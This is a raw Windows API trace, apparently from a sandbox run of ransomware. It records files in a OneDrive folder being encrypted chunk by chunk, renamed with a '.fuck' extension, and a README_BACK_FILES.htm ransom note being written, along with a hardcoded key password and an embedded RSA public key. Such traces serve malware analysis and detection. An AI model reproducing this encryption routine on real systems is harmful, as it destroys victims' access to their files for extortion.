[0273.985] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.985] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.985] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.985] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.986] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.986] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.986] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.986] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.986] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.986] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.986] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.986] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.986] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.986] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.986] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.986] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.987] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.987] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.987] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.987] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.987] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.988] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.988] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.988] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.988] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.988] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.988] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.988] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x50, lpOverlapped=0x0) returned 1 [0273.988] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x50, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x60) returned 1 [0273.988] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x60, lpOverlapped=0x0) returned 1 [0273.988] CloseHandle (hObject=0x5d3c) returned 1 [0273.988] CloseHandle (hObject=0x5d48) returned 1 [0273.988] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0273.995] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0273.996] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0273.998] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0273.999] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0273.999] CryptDestroyKey (hKey=0x2fae08) returned 1 [0273.999] CryptReleaseContext (hProv=0x2f28c28, dwFlags=0x0) returned 1 [0273.999] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0273.999] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0274.000] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\readme_back_files.htm")) returned 0xffffffff [0274.000] AreFileApisANSI () returned 1 [0274.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0274.000] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.001] GetFileType (hFile=0x5d4c) returned 0x1 [0274.001] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0274.002] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.004] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0274.005] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.005] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.005] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0274.005] GetLastError () returned 0x0 [0274.005] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\filesync.localizedresources.dll.mui")) returned 0x20 [0274.005] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0274.006] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.007] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0274.008] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0274.009] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f28c28) returned 1 [0274.011] CryptCreateHash (in: hProv=0x2f28c28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0274.011] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0274.011] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.011] CryptDeriveKey (in: hProv=0x2f28c28, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb108) returned 1 [0274.011] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.011] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0274.012] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f29398) returned 1 [0274.012] CryptImportPublicKeyInfo (in: hCryptProv=0x2f29398, dwCertEncodingType=0x1, pInfo=0x2f33fd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34000*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34008*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2faa48) returned 1 [0274.012] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0274.012] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29530*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f29530*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0274.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f29530*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f29530*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0274.013] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.024] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.024] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.036] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.037] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.037] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.037] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.037] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.037] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.038] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.038] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.038] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.038] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.038] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.038] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.038] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.039] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.039] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.039] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.039] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.039] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.039] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.039] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.039] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.039] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.039] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.039] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.039] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.039] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.039] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.040] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.040] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.040] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.040] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 